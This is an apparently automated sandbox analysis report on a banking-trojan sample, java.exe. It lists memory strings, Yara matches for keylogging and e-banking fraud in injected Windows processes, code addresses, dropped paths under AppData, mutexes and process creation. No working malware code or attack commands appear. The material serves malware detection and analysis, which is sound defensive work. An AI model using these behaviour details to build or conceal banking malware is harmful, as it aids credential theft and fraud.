            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1713964202.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
            Source: explorer.exe, 00000003.00000000.1713964202.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
            Source: SearchApp.exe, 0000000B.00000000.1933132623.0000024B58760000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1845864904.0000024B44184000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1884964111.0000024B55240000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqs
            Source: SearchApp.exe, 0000000B.00000000.1933132623.0000024B58760000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1845864904.0000024B44184000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqs
            Source: SearchApp.exe, 0000000B.00000000.1884964111.0000024B55240000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqshttps://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbm
            Source: SearchApp.exe, 0000000B.00000000.1933132623.0000024B58760000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1845864904.0000024B44184000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqs
            Source: SearchApp.exe, 0000000B.00000000.1933132623.0000024B58760000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1845864904.0000024B44184000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1884964111.0000024B55240000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqs
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
            Source: SearchApp.exe, 0000000B.00000000.1840976922.0000024B4248E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.ng.com
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
            Source: svchost.exe, 00000005.00000002.2994520970.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792111945.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1845305822.0000024B4402B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1840976922.0000024B4248E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com
            Source: svchost.exe, 00000005.00000002.2994520970.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792111945.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com/
            Source: SearchApp.exe, 0000000B.00000000.1845305822.0000024B4402B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.comm
            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownHTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49730 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: Yara match File source: Process Memory Space: java.exe PID: 6188, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: winver.exe PID: 6384, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: sihost.exe PID: 3420, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: svchost.exe PID: 3456, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: svchost.exe PID: 3528, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: ctfmon.exe PID: 3832, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: svchost.exe PID: 4196, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: StartMenuExperienceHost.exe PID: 4660, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4872, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: SearchApp.exe PID: 4984, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: bin.exe PID: 6940, type: MEMORYSTR

            E-Banking Fraud

            Source: Yara match | File source: Process Memory Space: java.exe PID: 6188, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: winver.exe PID: 6384, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: sihost.exe PID: 3420, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: svchost.exe PID: 3456, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: svchost.exe PID: 3528, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: ctfmon.exe PID: 3832, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: svchost.exe PID: 4196, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: StartMenuExperienceHost.exe PID: 4660, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4872, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: SearchApp.exe PID: 4984, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: bin.exe PID: 6940, type: MEMORYSTR
            Source: C:\Windows\explorer.exe | Code function: 3_2_01392270 NtQueryDirectoryFile
            Source: C:\Windows\explorer.exe | Code function: 3_2_01391EE1 NtCreateUserProcess
            Source: C:\Windows\System32\sihost.exe | Code function: 4_2_00AC21D1 NtEnumerateValueKey
            Source: C:\Users\user\Desktop\java.exe | Code function: 0_2_02220005
            Source: C:\Users\user\Desktop\java.exe | Code function: 0_2_02221845
            Source: C:\Users\user\Desktop\java.exe | Code function: 0_2_02220EA9
            Source: C:\Windows\SysWOW64\winver.exe | Code function: 2_2_047E1821
            Source: C:\Windows\SysWOW64\winver.exe | Code function: 2_2_047E0E85
            Source: C:\Windows\explorer.exe | Code function: 3_2_01391821
            Source: C:\Windows\explorer.exe | Code function: 3_2_01390E85
            Source: C:\Windows\explorer.exe | Code function: 3_2_03451821
            Source: C:\Windows\explorer.exe | Code function: 3_2_03450E85
            Source: C:\Windows\System32\sihost.exe | Code function: 4_2_00AC0E85
            Source: C:\Windows\System32\sihost.exe | Code function: 4_2_00AC1821
            Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00910E85
            Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00911821
            Source: C:\Windows\System32\svchost.exe | Code function: 6_2_009A0E85
            Source: C:\Windows\System32\svchost.exe | Code function: 6_2_009A1821
            Source: C:\Windows\System32\ctfmon.exe | Code function: 7_2_00A50E85
            Source: C:\Windows\System32\ctfmon.exe | Code function: 7_2_00A51821
            Source: C:\Windows\System32\svchost.exe | Code function: 8_2_00D40E85
            Source: C:\Windows\System32\svchost.exe | Code function: 8_2_00D41821
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | Code function: 9_2_00B50E85
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | Code function: 9_2_00B51821
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 10_2_00111821
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 10_2_00110E85
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | Code function: 12_2_001C1821
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | Code function: 12_2_001C0E85
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | Code function: 12_2_02240005
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | Code function: 12_2_02240EA9
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 17_2_00AB0E85
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 17_2_00AB1821
            Source: C:\Windows\System32\smartscreen.exe | Code function: 18_2_00291821
            Source: C:\Windows\System32\smartscreen.exe | Code function: 18_2_00290E85
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | Code function: 19_2_001C1821
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | Code function: 19_2_001C0E85
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | Code function: 19_2_02410005
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | Code function: 19_2_02410EA9
            Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe | Code function: 21_2_00581821
            Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe | Code function: 21_2_00580E85
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 22_2_003D1821
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 22_2_003D0E85
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 23_2_00900E85
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 23_2_00901821
            Source: C:\Windows\System32\ApplicationFrameHost.exe | Code function: 24_2_00181821
            Source: C:\Windows\System32\ApplicationFrameHost.exe | Code function: 24_2_00180E85
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 26_2_00191821
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 26_2_00190E85
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exe | Code function: 28_2_00011821
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exe | Code function: 28_2_00010E85
            Source: C:\Windows\System32\svchost.exe | Code function: 29_2_009F0E85
            Source: C:\Windows\System32\svchost.exe | Code function: 29_2_009F1821
            Source: C:\Windows\System32\conhost.exe | Code function: 30_2_00880E85
            Source: C:\Windows\System32\conhost.exe | Code function: 30_2_00881821
            Source: C:\Windows\System32\dllhost.exe | Code function: 31_2_00980E85
            Source: C:\Windows\System32\dllhost.exe | Code function: 31_2_00981821
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 33_2_00A20E85
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 33_2_00A21821
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 34_2_00061821
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 34_2_00060E85
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: 35_2_03071821
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: 35_2_03070E85
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: 36_2_02CE0E85
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: 36_2_02CE1821
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: 37_2_00641821
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: 37_2_00640E85
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: 38_2_006D1821
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: 38_2_006D0E85
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: 39_2_02EF0E85
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: 39_2_02EF1821
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: 40_2_01471821
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: 40_2_01470E85
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: 41_2_01161821
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: 41_2_01160E85
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: 42_2_01FF0E85
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: 42_2_01FF1821
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: 43_2_02631821
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: 43_2_02630E85
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: 44_2_00810E85
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: 44_2_00811821
            Source: C:\Windows\System32\conhost.exe | Code function: String function: 00883653 appears 35 times
            Source: C:\Windows\SysWOW64\winver.exe | Code function: String function: 047E3653 appears 35 times
            Source: C:\Windows\System32\svchost.exe | Code function: String function: 00913653 appears 35 times
            Source: C:\Windows\System32\svchost.exe | Code function: String function: 009A3653 appears 35 times
            Source: C:\Windows\System32\svchost.exe | Code function: String function: 00D43653 appears 35 times
            Source: C:\Windows\System32\svchost.exe | Code function: String function: 009F3653 appears 35 times
            Source: C:\Windows\System32\ctfmon.exe | Code function: String function: 00A53653 appears 35 times
            Source: C:\Windows\explorer.exe | Code function: String function: 03453653 appears 35 times
            Source: C:\Windows\explorer.exe | Code function: String function: 01393653 appears 34 times
            Source: C:\Windows\System32\ApplicationFrameHost.exe | Code function: String function: 00183653 appears 35 times
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exe | Code function: String function: 00013653 appears 35 times
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | Code function: String function: 02243677 appears 34 times
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | Code function: String function: 02413677 appears 34 times
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | Code function: String function: 001C3653 appears 70 times
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: String function: 02EF3653 appears 35 times
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: String function: 01473653 appears 35 times
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: String function: 00813653 appears 35 times
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: String function: 02633653 appears 35 times
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: String function: 02CE3653 appears 35 times
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: String function: 006D3653 appears 35 times
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: String function: 00643653 appears 35 times
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: String function: 03073653 appears 35 times
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: String function: 01163653 appears 35 times
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Code function: String function: 01FF3653 appears 35 times
            Source: C:\Windows\System32\smartscreen.exe | Code function: String function: 00293653 appears 35 times
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | Code function: String function: 00B53653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: String function: 00063653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: String function: 00193653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: String function: 003D3653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: String function: 00113653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: String function: 00903653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: String function: 00AB3653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: String function: 00A23653 appears 35 times
            Source: C:\Windows\System32\sihost.exe | Code function: String function: 00AC3653 appears 35 times
            Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe | Code function: String function: 00583653 appears 35 times
            Source: C:\Windows\System32\dllhost.exe | Code function: String function: 00983653 appears 35 times
            Source: C:\Users\user\Desktop\java.exe | Code function: String function: 02223677 appears 34 times
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | Section loaded: nss3.dll (2 occurrences)
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe | Section loaded: nss3.dll (10 occurrences)
            Source: java.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
            Source: classification engine | Classification label: mal100.bank.expl.evad.winEXE@10/10@4/3
            Source: C:\Users\user\Desktop\java.exe | Code function: 0_2_02220005 ExitProcess,GetProcAddress,IsWow64Process,GetModuleHandleW,GetStartupInfoA,ReadFile,WriteFile,SetFilePointer,CloseHandle,CreateToolhelp32Snapshot,Process32Next,OpenProcess,VirtualFree,VirtualAllocEx,CreateMutexA
            Source: C:\Windows\SysWOW64\winver.exe | File created: C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\AC\E38A1E29
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:352:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6212:120:WilError_03
            Source: C:\Windows\SysWOW64\winver.exe | Mutant created: \Sessions\1\BaseNamedObjects\E38A1E29
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_03
            Source: C:\Windows\explorer.exe | File read: C:\Users\user\Searches\desktop.ini
            Source: C:\Users\user\Desktop\java.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: java.exe | ReversingLabs: Detection: 89%
            Source: unknown | Process created: C:\Users\user\Desktop\java.exe C:\Users\user\Desktop\java.exe
            Source: C:\Users\user\Desktop\java.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\java.exe | Process created: C:\Windows\SysWOW64\winver.exe winver
            Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe "C:\Users\user\AppData\Roaming\E38A1E29\bin.exe"
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe "C:\Users\user\AppData\Roaming\E38A1E29\bin.exe"
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KIdSIJzxFEgRWLYApSEFvZXik.exe, 0000002B.00000002.2969338843.000000000051E000.00000002.00000001.01000000.00000007.sdmp
            Note: this PDB path identifies KIdSIJzxFEgRWLYApSEFvZXik.exe as Joe Sandbox's own FakeChrome decoy browser, not a file dropped by the sample; the code-function, string-function and nss3.dll findings attributed to that binary elsewhere in this report reflect the banker's code running inside the sandbox's decoy browser.
            Source: java.exe | Static PE information: section name: .imports
            Source: bin.exe.2.dr | Static PE information: section name: .imports
            Source: C:\Users\user\Desktop\java.exe | Code function: 0_2_02220C1A push edi; ret 0_2_02220C56
            Source: C:\Users\user\Desktop\java.exe | Code function: 0_2_02220B89 push edi; ret 0_2_02220C56
            Source: C:\Windows\SysWOW64\winver.exe | Code function: 2_2_047E0B65 push edi; ret 2_2_047E0C32
            Source: C:\Windows\SysWOW64\winver.exe | Code function: 2_2_047E0BF6 push edi; ret 2_2_047E0C32
            Source: C:\Windows\explorer.exe | Code function: 3_2_01390B65 push edi; ret 3_2_01390C32
            Source: C:\Windows\explorer.exe | Code function: 3_2_01390BF6 push edi; ret 3_2_01390C32
            Source: C:\Windows\explorer.exe | Code function: 3_2_03450B65 push edi; ret 3_2_03450C32
            Source: C:\Windows\explorer.exe | Code function: 3_2_03450BF6 push edi; ret 3_2_03450C32
            Source: C:\Windows\System32\sihost.exe | Code function: 4_2_00AC0BF6 push edi; ret 4_2_00AC0C32
            Source: C:\Windows\System32\sihost.exe | Code function: 4_2_00AC0B65 push edi; ret 4_2_00AC0C32
            Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00910BF6 push edi; ret 5_2_00910C32
            Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00910B65 push edi; ret 5_2_00910C32
            Source: C:\Windows\System32\svchost.exe | Code function: 6_2_009A0BF6 push edi; ret 6_2_009A0C32
            Source: C:\Windows\System32\svchost.exe | Code function: 6_2_009A0B65 push edi; ret 6_2_009A0C32
            Source: C:\Windows\System32\ctfmon.exe | Code function: 7_2_00A50BF6 push edi; ret 7_2_00A50C32
            Source: C:\Windows\System32\ctfmon.exe | Code function: 7_2_00A50B65 push edi; ret 7_2_00A50C32
            Source: C:\Windows\System32\svchost.exe | Code function: 8_2_00D40BF6 push edi; ret 8_2_00D40C32
            Source: C:\Windows\System32\svchost.exe | Code function: 8_2_00D40B65 push edi; ret 8_2_00D40C32
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | Code function: 9_2_00B50BF6 push edi; ret 9_2_00B50C32
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | Code function: 9_2_00B50B65 push edi; ret 9_2_00B50C32
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 10_2_00110B65 push edi; ret 10_2_00110C32
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 10_2_00110BF6 push edi; ret 10_2_00110C32
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | Code function: 12_2_001C0B65 push edi; ret 12_2_001C0C32
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | Code function: 12_2_001C0BF6 push edi; ret 12_2_001C0C32
